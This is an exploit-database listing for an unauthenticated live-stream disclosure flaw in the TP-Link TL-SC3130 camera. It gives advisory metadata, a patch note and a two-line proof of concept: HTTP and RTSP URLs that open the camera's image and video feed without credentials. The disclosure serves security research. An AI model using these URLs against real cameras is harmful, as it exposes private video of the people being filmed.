header-logo
Suggest Exploit
vendor:
TL-SC3130
by:
Gjoko 'LiquidWorm' Krstic
7.5
CVSS
HIGH
Unauthorized Live RTSP Stream Disclosure
N/A
CWE
Product Name: TL-SC3130
Affected Version From: 1.6.18P12_121101
Affected Version To: 1.6.18P12_121101
Patch Exists: Yes
Related CWE: N/A
CPE: h:tp-link:tl-sc3130
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Boa/0.94.14rc21
2018

TP-Link TL-SC3130 1.6.18 – RTSP Stream Disclosure

The TP-Link TL-SC3130 suffers from an unauthenticated and unauthorized live RTSP stream disclosure. An attacker can exploit this vulnerability by sending a crafted HTTP request to the target device to access the RTSP stream.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update their devices to the latest version.
Source

Exploit-DB raw data:

# Exploit Title: TP-Link TL-SC3130 1.6.18 - RTSP Stream Disclosure
# Author: Gjoko 'LiquidWorm' Krstic @zeroscience
# Date: 2018-10-17
# Vendor: TP-LINK Technologies Co., Ltd.
# Product web page: http://www.tp-link.com
# Affected version: 1.6.18P12_121101
# Tested on: Boa/0.94.14rc21
# CVE: N/A
# References:
# Advisory ID: ZSL-2018-5497
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5497.php

Desc: The TP-Link TL-SC3130 suffers from an unauthenticated and unauthorized
live RTSP stream disclosure.

# PoC:

http://TARGET/jpg/image.jpg
rtsp://TARGET:554/video.3gp

Navigation

Suggest Exploit

Services By CQR